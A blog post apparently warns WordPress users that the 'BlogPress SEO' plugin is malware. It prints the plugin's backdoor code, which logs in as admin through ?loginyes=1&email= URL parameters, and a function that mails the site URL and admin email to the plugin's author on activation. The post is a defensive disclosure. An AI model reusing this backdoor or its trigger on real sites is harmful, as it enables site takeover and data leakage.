BlogPress SEO is Malware

As with most scamming attempts, it all started with an email—which I ignored when I received it on Wednesday. It made claims of terrific SEO improvements using backlinks—yeah right. I do not use SEO enhancement plugins (other than Google XML sitemaps), and never plan on doing so. Anyways, the sender’s name as Saurabh, and his message was as follows:

Hello, My name is Saurabh, and I am here to offer you a unique wordpress plugin which will get you 100’s of backlinks like crazy. The plugin is 100% free and I can also offer installation help. http://BlogPressSEO.com Why backlinks are important for getting traffic. http://BlogPressSEO.com/#1 This is how the plugin works http://BlogPressSEO.com/#2 Thanks


Well, even though I was not going to install the plugin, the engineer in me wanted to investigate the code. So, I downloaded it, and did not like what I saw. Not only are there malicious components, there are several stylistic issues, and the plugin author did not follow some of the WordPress plugin best practices. A short list of stylistic issues:

  • Did not use a unique prefix to functions to work avoid function name collisions. Function names such as: fun_serverpath, SureRemoveDir, fun_create_menu_wplink wplink_activate, cleansee, etc. While is looks like fun_ is the unique prefix the author is using, fun is too common of a word for a prefix and is used to denote a quantity is a function in some programming styles. Plus there is a ton of inconsistency between function names.
  • Saves it’s settings across several options entries. While this is no longer a great performance issue, thanks to autoloading, it still clutters the wp_options table and does slow down every page load by a little bit. At least the author seems to use hwe_ as the option prefix for most of the options it creates, too bad this was not done for the functions.
  • Performs manual sql queries, not using the $wpdb object.

Analysis of the code is a little frightening. Look at this block of code:

//if loginyes and emial then login
if($loginyes==1  && $email==get_option('admin_email'))
{
	global $wpdb;
	$tabname=$wpdb->prefix."users";
	$find_admin_sql="select * from $tabname where user_login='admin'";
	$find_sql=mysql_query($find_admin_sql);
	$user_numrow=mysql_num_rows($find_sql);
	if($user_numrow!=0)
	{
		$user_login='admin';
	}
	if($user_numrow==0)
	{
		$find_ana_admin_sql="select * from $tabname";
		$find_sql_res=mysql_query($find_ana_admin_sql);
		while($row_find=mysql_fetch_array($find_sql_res))
		{
			$userid=$row_find['ID'];
			$user_login_find=$row_find['user_login'];
			$level=get_usermeta( $userid,'wp_user_level');
			if($level==10)
			{
				$user_login=$user_login_find;
				break;
			}
		}
	}
	$user=new WP_User(0, $user_login);
	$user_pass = md5($user->user_pass);
	wp_login($user_login, $user_pass, true);
	wp_setcookie($user_login, $user_pass, true);
	wp_set_current_user($user_id, $user_login);
	$radirect=get_option('home')."/wp-admin";
	echo "<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-wp-preserve="%3Cscript%20language%3D%22javascript%22%3E%22%3B%3Cbr%20%2F%3E%0A%09echo%20%22location.replace('%24radirect')%22%3B%3Cbr%20%2F%3E%0A%09echo%20%22%3C%2Fscript%3E" data-mce-resize="false" data-mce-placeholder="1" class="mce-object" width="20" height="20" alt="<script>" title="<script>" />";
}

Well, looks like a backdoor, right? Knowing that $loginyes and $email are set using get superglobals is even more worrying. Just append ?loginyes=1&email= to any url on a site running this script will get you in, all you need to know is the email address of the admin. Now, who would have that information?

function email_send_fun()
{
	$headers="From:".get_option('admin_email')."\n";
	$headers.="Reply-to:".get_option('admin_email')."\n";
	$sub="BlogPressSeo new installation.";
	$mes=get_option('siteurl');
	$to="info@blogpressseo.com";
	mail($to,$sub,$mes,$headers);
	$hwe_blogidd=get_option("hwe_blogid");

	update_option("hwe_saveradio_option",3);
	update_option("hwe_linkplacement",3);

	if($hwe_blogidd)
	{
		wplink_activate();
	}
}

Oh, right, that would be whoever reads info@blogpressseo.com. This is the malicious function Joost de Valk found and reported in his post BlogPress SEO Plugin: Spam!. This function runs every time the plugin is activated.

If you have installed this plugin, delete it immediately. Then, change your admin email address (under Settings > General, look for the option E-mail address). You’ll have to manually clean up your wp_options table as the author did not provide an uninstall method.

Update: You may want to read the next post on this topic, “BlogPress SEO Aftermath“.

-John Havlik

Trackbacks/Pingbacks

  1. Pingback: A Paused Episode 462 | The CaffiNation Podcast

  2. Pingback: BlogPress SEO One Week | Mtekk's Crib

  3. Pingback: BlogPress SEO is Malware | Mtekk’s Crib | Internet Marketing NY | SMO NY | Search Engine Optimization

  4. Pingback: BlogPress SEO is Malware | Mtekk's Crib | HNL HIP HOP

  5. Pingback: WordPress Security 101: 8 Tips, Tricks and Tweaks to Secure Your WordPress Website - WordPress, Multisite and BuddyPress plugins, themes, news and help – WPMU.org

  6. Pingback: BlogPress SEO plugin isn’t just bad, it’s malware | Computer Technology

  7. Pingback: BlogPress SEO: solved | Programming Blog

  8. Pingback: BlogPress SEO: solved | Affaholic.com

  9. Pingback: Security Tips for your Wordpress Blog | kimtown Studios - Waynesboro, PA Web Design, Boutique & Photography

  10. Pingback: SEO + wordpress themes = shenanigans! | MetaFilter :Seo Information Search

  11. Pingback: The WordPress.org Commit Breakin – Evil Code | mtekk's Crib

  12. Pingback: El plugin BlogPress SEO es malware | Webmasters Actualidad Tecnologia

  13. Pingback: BlogPress SEO: A Year Later | mtekk's Crib

  14. Pingback: Google +1 Click Jacking | mtekk's Crib

  15. Pingback: Seo Plugin per Wordpress: occhio a cosa installate - Posizionamento Zen | Posizionamento Zen

  16. Pingback: BlogPress SEO is Malware | mtekk's Crib | Creative Web Publishing | Scoop.it

  17. Pingback: BlogPress SEO is Malware | mtekk's Crib | Creative Publishing (Not about Writing or Marketing) | Scoop.it

77 thoughts on “BlogPress SEO is Malware

  1. It is really bad.

    Being an IT guy, we can’t just install plugins. It is better to investigate like this and then only install.

    Thanks for this info.

Comments are closed.